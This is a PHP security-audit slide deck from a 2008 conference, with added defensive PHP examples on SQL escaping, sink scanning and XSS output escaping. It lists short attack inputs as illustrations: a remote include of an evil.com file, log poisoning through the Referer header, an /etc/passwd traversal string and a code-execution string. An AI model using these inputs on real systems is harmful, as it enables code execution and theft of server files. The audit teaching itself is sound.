Do-It-Yourself Audits
Dutch PHP Conference
Amsterdam 2008
The bald guy in the front
 Johann-Peter Hartmann
 Full-time PHP Developer since 3.0.4
 loves LAMP: the great people, it's fun.
 Security is just fun
 CTO and Founder of Mayflower GmbH
 CEO of SektionEins GmbH
Our Business Model

Mayflower GmbH   : Create insecure Software
SektionEins GmbH : Fix it

= Get paid twice.
Agenda

State of Security for PHP
Risk Analysis
White Box Audits
Input flow analysis
Tools to help you
PHP and Security
[Pie chart, legend: Profit, Fun. Source: Breach 2007]

[Pie chart, legend: Information theft, Defacement, Malware, Unknown, Fraud, Blackmail, Link Spam, Worms, Phishing, Information Warfare. Source: Breach 2007]

[Pie chart, legend: SQL Injection, Information Disclosure, Known Exploits, XSS, Missing Authentication, Guessing of Logins/Sessions, OS Code Execution, Wrong configurations, Missing Anti-Automation, Denial Of Service, Redirect, Wrong Session-Timeout, CSRF. Source: NSI 2006]
Risk Analysis
Why do it, anyway?

Best way: verify the whole application
Second best: audit the whole source code
Average: 2000 LOC/Day
More than one year for a 500.000 LOC application.
Marco just told me that he got a 3.000.000 LOC application
Better not audit everything.
Check Data Flows for STRIDE
Check every data exchange point for
  Spoofing (fake Referer, stolen session IDs)
  Tampering (XSS, CSRF)
  Repudiation (identity theft, identity coverage)
  Information Disclosure (SQL injections, XSS, ...)
  Denial of Service (logout after 3 failed logins)
  Elevation of Privileges (code execution, ...)
How to Analyze Risks

  External Entities: Spoofing, Repudiation
  Processes: Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privileges
  Database: Tampering, Information Disclosure, DoS
  Data flow: Tampering, Information Disclosure, DoS
How to Analyze Risks
Now what's the absolute risk?
Rate every risk with DREAD:
  Damage Potential
  Reproducibility
  Exploitability
  Affected Users
  Discoverability
Where to start auditing?

risk = chance of attack * damage potential

High-risk example: SQL injection in a login form
Tools needed for manual Source Code Audits
Some people say: you just need "grep"
A decent code browser with
  syntax highlighting
  good code navigation
Dynamic code analysis: a debugger with
  step-through
  variable introspection, conditional breakpoints
Critical Function Analysis

 Some functions are more dangerous than others.
 Every exploit class has its own set of functions;
 think of SQL injections or code execution.
 So just search for every critical function and check
 whether its parameters are escaped correctly.
SQL Injections
Functions: mysql_query(), mysqli_query(), PDO::query(), ...
Your own database abstraction layer
What to check:
  Are the parameters correctly escaped?
  Even numbers, sort orders and directions?
  Table and column names?
Look out for proper escaping of values, column names,
sort orders etc.
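An added example, not from the slides, for the "numbers, sort orders and column names" check: a vulnerable listing function beside a hardened one, using PDO with an in-memory SQLite database (pdo_sqlite assumed) and a constructed users table.

```php
<?php
// Added example, not from the slides: the "numbers, sort orders and column names"
// check from the SQL Injection slide. ORDER BY and LIMIT cannot be bound as
// parameters, so escaping the value is not enough; identifiers need a whitelist
// and numbers a cast. Demo uses an in-memory SQLite database (pdo_sqlite assumed).

// Vulnerable: every part of the query is interpolated, including the "numeric"
// page size and the column name, so all of them reach the SQL parser as text.
function listUsersVulnerable(PDO $pdo, string $name, string $sort, string $dir, string $limit): array
{
    $sql = "SELECT id, name FROM users WHERE name LIKE '%$name%' ORDER BY $sort $dir LIMIT $limit";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is a bound parameter, identifiers and keywords are mapped
// through an explicit whitelist, and the number is cast and range-checked.
const SORTABLE_COLUMNS = ['id' => 'id', 'name' => 'name', 'created' => 'created_at'];

function listUsersHardened(PDO $pdo, string $name, string $sort, string $dir, $limit): array
{
    if (!array_key_exists($sort, SORTABLE_COLUMNS)) {
        throw new InvalidArgumentException('unknown sort column');
    }
    $column    = SORTABLE_COLUMNS[$sort];
    $direction = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';  // only two legal values
    $limit     = (int) $limit;                                   // "10 OR 1=1" becomes 10
    if ($limit < 1 || $limit > 100) {
        $limit = 20;
    }
    // LIKE wildcards supplied by the user are escaped, so "%" stays a literal.
    $pattern = '%' . addcslashes($name, '%_\\') . '%';
    $stmt = $pdo->prepare("SELECT id, name FROM users WHERE name LIKE :pattern ESCAPE '\\' "
                        . "ORDER BY $column $direction LIMIT $limit");
    $stmt->execute([':pattern' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data for the demo.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, created_at TEXT)");
$pdo->exec("INSERT INTO users (name, created_at) VALUES ('alice', '2008-01-01'), ('bob', '2008-02-01')");

// The hardened version refuses an unexpected sort column instead of running it ...
try {
    listUsersHardened($pdo, 'a', 'name; DROP TABLE users', 'desc', '10 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// ... and reduces the other inputs to their legal shape, returning only the bob row.
print_r(listUsersHardened($pdo, 'b', 'created', 'DESC', '10 OR 1=1'));
```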
Code Executions
Functions:
  eval(), create_function(), preg_replace() with the e modifier,
  usort(), uasort(), *_callback functions
Written and included code:
  Templates in Smarty
  Cache data
Look out for: (external) variables in PHP code
Strings can contain code executions! "{${phpinfo}}"
Code Inclusions

Functions:
(include|require)[_once]
Local: include "/var/log/http/access.log" with my Referer
Remote: include "http://evil.com/hack.gif"
Other: "ftp://..", "php://input...", "data://..."
allow_url_fopen does not protect against data:// and php://!
Shell Executions

 Functions:
 shell_exec() (backticks!), exec(), system(), popen(),
 passthru()
 mail()!
 The binary name and its arguments need to be escaped.
 Check for the presence of escapeshellcmd() and
 escapeshellarg().
Information leakage
 Functions: fopen(), fread(), file(), ...
 Vulnerabilities:
   read local files containing database passwords
   read intranet URLs
   read local server configuration files
 Check for injection of "/../../etc/passwd%00"
Input Flow Analysis

 Follow the path that variables take through the application
 Faster than a critical function analysis
 PHP accepts every external variable by default
 The variables come from an untrusted environment
 As soon as PHP gets a taint mode, PHP will help you a lot
Input Flow Analysis

 $_GET, $_POST, $_COOKIE
 some $_SERVER variables! Don't trust $HTTP_HOST.
 register_globals makes it hard to follow
 Check whether external variables, or values derived from them,
 are used in critical functions
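An added example, not from the slides, for the critical function analysis and input flow analysis slides above: a token-based scanner in PHP that lists calls to the sinks named on the slides and flags those with a superglobal in the same statement. The sink list and the sample source are constructed assumptions; it handles plain function calls only, so method-call sinks such as PDO::query() still need a manual grep.

```php
<?php
// Added example, not from the slides: a small critical-function scanner that also does the
// first step of input flow analysis. token_get_all() locates every call to a sink named on
// the slides and marks it TAINTED when a superglobal occurs in the same statement. Flow
// through intermediate variables is not followed, so this is a triage list, not a proof.
const SINKS = ['mysql_query' => 'sql', 'mysqli_query' => 'sql', 'create_function' => 'code',
    'preg_replace' => 'code', 'usort' => 'code', 'uasort' => 'code', 'shell_exec' => 'shell',
    'exec' => 'shell', 'system' => 'shell', 'popen' => 'shell', 'passthru' => 'shell',
    'mail' => 'shell', 'fopen' => 'file', 'fread' => 'file', 'file' => 'file'];
const SOURCES = ['$_GET', '$_POST', '$_COOKIE', '$_REQUEST', '$_SERVER', '$GLOBALS'];

function sig(array $tokens, int $i, int $step): string  // nearest token text before (-1) / after (+1)
{
    do {
        $t = $tokens[$i += $step] ?? '';
    } while (is_array($t) && in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true));
    return is_array($t) ? $t[1] : $t;
}

function scanPhpSource(string $code): array
{
    $tokens = token_get_all($code);
    $findings = []; $line = 1; $open = false;
    foreach ($tokens as $i => $t) {
        $class = null;
        if (is_array($t)) {
            $line = $t[2];
            $name = strtolower($t[1]);
            if ($t[0] === T_STRING && array_key_exists($name, SINKS) && sig($tokens, $i, 1) === '('
                && !in_array(sig($tokens, $i, -1), ['function', '->', '::'], true)) {
                $class = SINKS[$name];          // a plain call, not a definition or a method call
            } elseif (in_array($t[0], [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE], true)) {
                $class = $t[0] === T_EVAL ? 'code' : 'include';   // language constructs, not T_STRING
            }
        } elseif ($t === '`') {
            $open = !$open;                     // backticks are shell_exec(); report the opening one
            $class = $open ? 'shell' : null;
        }
        if ($class === null) continue;
        $tainted = false;                       // any superglobal in the rest of the statement?
        for ($j = $i + 1; isset($tokens[$j]) && $tokens[$j] !== ';'; $j++) {
            $tainted = $tainted || (is_array($tokens[$j]) && $tokens[$j][0] === T_VARIABLE
                                     && in_array($tokens[$j][1], SOURCES, true));
        }
        $findings[] = ['line' => $line, 'class' => $class, 'sink' => is_array($t) ? $t[1] : '`', 'tainted' => $tainted];
    }
    return $findings;
}

$sample = <<<'SRC'
<?php
$r = mysql_query("SELECT * FROM news WHERE id = " . $_GET['id']);
include "tpl/" . $_COOKIE['lang'] . ".php";
$o = `ls -l /tmp`;
$s = mysql_query("SELECT * FROM news WHERE id = " . (int) $id);
SRC;
foreach (scanPhpSource($sample) as $f) {   // $sample is a constructed stand-in for a file under review
    printf("line %d %-8s %-12s %s\n", $f['line'], $f['class'], $f['sink'], $f['tainted'] ? 'TAINTED' : 'check');
}
```

For a real audit, feed it file_get_contents() of each file in the checkout and review the TAINTED lines first; the "check" lines still need the escaping check from the previous slides.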
XSS: Output Escaping check
Check every place where data is delivered to the user
There are 5 different kinds of escaping for XSS:
  Text: htmlentities()
  Attributes: htmlspecialchars()
  URLs: urlencode()
  JavaScript- and Stylesheet-Strings: addcslashes()
  HTML: Whitelist-Filters like htmlpurifier
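An added example, not from the slides: the escaping contexts from the list above as PHP helpers, plus a constructed test value and the check a reviewer would apply to each; the helper names and the test value are assumptions, and the HTML whitelist case is not implemented here.

```php
<?php
// Added example, not from the slides: one helper per output context from the list
// above, plus a constructed value and the check a reviewer would apply to each.
// The HTML whitelist case (HTML Purifier) needs a real parser and is left out.
function escText(string $s): string { return htmlentities($s, ENT_QUOTES, 'UTF-8'); }

// ENT_QUOTES is essential for attributes: ENT_COMPAT (the default before PHP 8.1)
// leaves the single quote alone, so a single-quoted attribute can be closed early.
function escAttr(string $s): string { return htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); }

// One query-string parameter. Scheme and host stay fixed in the template:
// urlencode() does not make a whole user-supplied URL safe (think javascript:).
function escUrlParam(string $s): string { return urlencode($s); }

// A quote-delimited JavaScript or CSS string: escape the delimiters, backslash and
// line breaks, and "/" so that a "</script>" inside the data cannot end the block.
function escJsString(string $s): string
{
    return str_replace('/', '\/', addcslashes($s, "\\\"'\n\r\0"));
}

// The same value rendered into three contexts of one page.
function renderProfile(string $name, string $site): string
{
    return '<p>' . escText($name) . "</p>\n"
         . "<a title='" . escAttr($name) . "' href=\"/go?to=" . escUrlParam($site) . "\">site</a>\n"
         . '<script>var user = "' . escJsString($name) . "\";</script>\n";
}

// Constructed test value: it carries every delimiter the contexts care about.
$name = "O'Neil <b>\"x\"</b> & </script>";
$site = "http://example.test/?a=1&b=2";
echo renderProfile($name, $site);

// The output check as code: after escaping, the delimiter that would end the
// context must be gone. The last entry shows the wrong escaper and prints FAIL.
$checks = [
    'text'                    => strpbrk(escText($name), '<>') === false,
    'attr'                    => strpbrk(escAttr($name), "'\"<>") === false,
    'url param'               => strpbrk(escUrlParam($site), '&"\'<>') === false,
    'js string'               => strpos(escJsString($name), '</') === false,
    'attr without ENT_QUOTES' => strpos(htmlspecialchars($name, ENT_COMPAT), "'") === false,
];
foreach ($checks as $ctx => $ok) {
    echo $ctx, ': ', $ok ? 'ok' : 'FAIL', "\n";
}
```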
Tools for Static Analysis
  RATS: http://www.fortifysoftware.com/security-resources/rats.jsp
    finds simple bugs like TOCTOU
  PHP-SAT: http://www.program-transformation.org/PHP/PhpSat
    has a freely definable set of rules for security checks
  Armorize CodeSecure: http://www.armorize.com/
  HyperSource, Fortify
Other tools
 XSSS for automated XSS search
 http://www.sven.de/XSSS
 A lot of other web security scanners
   SPIDynamics WebInspect
   NStalker
   Chorizo does PHP gray box scanning
   ... and a lot more
Summary

Even if you have time to do a full code review, use risk
analysis to focus.
Code review:
Use critical function analysis plus an output check, or input
flow analysis.
Tools can help you, but they don't do your job.
Questions?

Contact me at:
  johann-peter.hartmann@sektioneins.de